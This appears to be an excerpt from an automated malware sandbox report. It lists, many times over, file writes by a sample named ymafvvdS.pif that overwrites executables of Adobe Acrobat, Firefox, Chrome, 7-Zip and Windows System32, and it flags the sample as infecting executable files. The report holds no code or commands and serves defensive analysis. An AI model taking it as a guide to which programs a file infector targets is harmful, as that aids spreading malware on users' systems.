                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
